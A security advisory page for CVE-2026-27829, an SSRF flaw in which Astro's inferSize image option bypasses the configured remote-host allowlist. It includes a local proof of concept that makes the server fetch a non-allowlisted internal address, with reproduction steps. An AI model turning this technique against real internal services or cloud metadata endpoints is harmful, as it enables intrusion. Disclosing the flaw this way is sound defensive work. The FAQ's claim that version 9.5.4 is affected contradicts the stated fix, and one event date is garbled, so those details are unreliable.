CVE-2026-27829: Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

Published Feb 25, 2026
·
Updated

Summary

A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.

Details

Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.

PoC

<details>

Setup

Create a new Astro project with the following files:

package.json: json { "name": "poc-ssrf-infersize", "private": true, "scripts": { "dev": "astro dev --port 4322", "build": "astro build" }, "dependencies": { "astro": "5.17.2", "@astrojs/node": "9.5.3" } }

astro.config.mjs — only localhost:9000 is authorized: javascript import { defineConfig } from 'astro/config'; import node from '@astrojs/node';

export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), image: { remotePatterns: [ { hostname: 'localhost', port: '9000' } ] } });

internal-service.mjs — simulates an internal service on a non-allowlisted host (127.0.0.1:8888): javascript import { createServer } from 'node:http'; const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64'); createServer((req, res) => { console.log([INTERNAL] Received: ${req.method} ${req.url}); res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length }); res.end(GIF); }).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));

src/pages/test.astro: astro --- import { getImage } from 'astro:assets';

const result = await getImage({ src: 'http://127.0.0.1:8888/internal-api', inferSize: true, alt: 'test' }); --- <html><body> <p>Width: {result.options.width}, Height: {result.options.height}</p> </body></html>

Steps to reproduce

1. Run npm install and start the internal service:

bash node internal-service.mjs

2. Start the dev server:

bash npm run dev

3. Request the page:

bash curl http://localhost:4322/test

4. internal-service.mjs logs Received: GET /internal-api — the request was sent to 127.0.0.1:8888 despite only localhost:9000 being in the allowlist.

</details>

Impact

Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.

Other sources

Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options). However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue.

NVD

Affected Software

2 affected componentsFixes available
npm/@astrojs/node>=9.0.0<9.5.4
9.5.4
astro \@astrojs\/node Node.js>=9.0.0<9.5.4

Event History

Feb 25, 2026
Advisory Published
via GitHub·06:11 PM
Data Sourced
via GitHub·06:11 PM
DescriptionSeverityWeaknessAffected Software
Feb 26, 2026
CVE Published
via MITRE·12:36 AM
Data Sourced
via MITRE·12:36 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·01:16 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·01:16 AM
RemedyAffected Software
Jan 9, 58157
Event
via NVD·02:24 AM
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-27829?

CVE-2026-27829 has been classified as a moderate severity vulnerability due to its potential to bypass security restrictions on remote image fetching.

2

How do I fix CVE-2026-27829?

To fix CVE-2026-27829, upgrade your @astrojs/node package to version 9.5.4 or later.

3

What is the impact of CVE-2026-27829 on my application?

CVE-2026-27829 allows unauthorized remote hosts to be accessed through Astro's image pipeline, potentially leading to information disclosure or loading malicious content.

4

Which versions of @astrojs/node are affected by CVE-2026-27829?

CVE-2026-27829 affects versions of @astrojs/node between 9.0.0 and 9.5.4, inclusive.

5

Is there a workaround for CVE-2026-27829 if I cannot upgrade?

There are no known workarounds for CVE-2026-27829, and upgrading is the recommended solution to mitigate the vulnerability.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203